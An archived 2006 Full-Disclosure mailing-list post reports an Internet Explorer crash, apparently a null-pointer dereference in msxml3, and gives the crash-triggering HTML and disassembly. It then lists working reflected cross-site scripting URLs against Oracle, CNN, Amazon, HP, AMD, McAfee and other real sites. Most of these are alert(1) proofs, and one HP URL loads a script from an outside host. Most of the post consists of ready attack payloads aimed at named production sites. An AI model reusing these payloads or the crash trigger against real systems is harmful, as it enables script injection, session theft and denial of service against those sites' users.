[<prev] [next>] [day] [month] [year] [list]
Message-ID: <dd5f5ac90608060248g62bdffbdu62db618da9967752@mail.gmail.com>
Date: Sun, 6 Aug 2006 11:48:18 +0200
From: "Thomas Pollet" <thomas.pollet@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: bugs
Hi,
I have found ie crashing when refreshing an iframe containing an xml file
with xsl stylesheet (takes a while to crash).
I used this html:
---------------------------------
<html>
<head>
<script language="javaScript">
function refresh() {
frames[0].window.location.reload();
setTimeout("refresh();", 20);
}
</script>
</head>
<body><iframe src="input.xml"></iframe>
<script>
refresh();
</script>
</body>
</html>
----------------------------------
input.xml is calling an xsl stylesheet (cfr. attachment)
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="style2.xsl"?>
----------------------------------
w2k:
msxml3.dll:69B76B61 mov eax, [esi]
msxml3.dll:69B76B63 mov ecx, esi
msxml3.dll:69B76B65 call dword ptr [eax+48h]
with esi=0
MSHTML.DLL:637840E8 test byte ptr [eax+44Dh], 20h
with eax=0
xp:
msxml3.dll:74992156 8B43 14 MOV EAX,DWORD PTR DS:[EBX+14]
EBX=0
seem like nullpointer derefs.
Weird thing it crashes on different addies, somebody can shed some light on
why is this?
obligatory xss:
http://search.oracle.com/search/search?keyword=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&start=1&nodeid=&fid=&showSimilarDoc=true&group=Allsecure
search, lol?
oreilly.com: search powered by
http://promosearch.atomz.com/search/promosearch?query=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&sp-q=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&sp-a=sp1000a5a9&sp-f=ISO-8859-1&sp-t=general&sp-x-1=cat&sp-q-1=&sp-x-2=cat2&sp-q-2=&sp-c=25&sp-p=all&sp-k=Articles%7CBooks%7CConferences%7COther%7CWeblogs&c=&p=
http://www.altavista.com/web/results?itag=ody&q=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&kgs=1&kls=0
http://audience.cnn.com/services/cnn/memberservices/member_register.jsp?pid=%22%3E%3Cscript%3Ealert(1)%3C/script%3Ey00&source=cnn&url=http%3A%2F%2Faudience.cnn.com%2Fservices%2Fcnn%2Fmemberservices%2Fregwall%2Fmember_profile.jsp%3Fsource%3Dcnn
<http://audience.cnn.com/services/cnn/memberservices/member_register.jsp?pid=%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ey00&source=cnn&url=http%3A%2F%2Faudience.cnn.com%2Fservices%2Fcnn%2Fmemberservices%2Fregwall%2Fmember_profile.jsp%3Fsource%3Dcnn>
http://www.ask.com/web?q=%2BADw-%2Ftitle%2BAD4-%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&qsrc=1&o=333&l=dir
http://search.amd.com/query.html?col=idx1&qt=amd+%22%3E+%3Cscript%3E+alert%281%29+%3C%2Fscript%3E&charset=iso-8859-1&qp=url%3A%2Fus-en%2F+url%3A%2Fsg-en%2F+url%3A%2Fepd%2F&qs=%7C+language%3Aen&la=en&lap=en&qm=1&tqmhak=0
http://www.amazon.com/s/ref=nb_ss_gw/103-7930143-9476650?ie=UTF-8&url=search-alias%3Daps
&field-keywords=%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&Go.x=11&Go.y=10
http://search.hp.com/query.html?charset=iso-8859-1&la=en&hpvc=sitewide&qs=&nh=10&lk=1&rf=0&uf=1&st=1&qt=hp+%27%22y00--%3E%3C%2Fscript%3E%3Cscript+src%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E&submitsearch.x=0&submitsearch.y=0
http://us.mcafee.com/virusInfo/ : enter following in virus search: (use POST
form for exploit)
"><script>alert(1)</script>
cheers,
Thomas
Content of type "text/html" skipped
View attachment "input.xml" of type "text/xml" (1367 bytes)
View attachment "style2.xsl" of type "text/xml" (494 bytes)
View attachment "frame2.html" of type "text/html" (1956 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists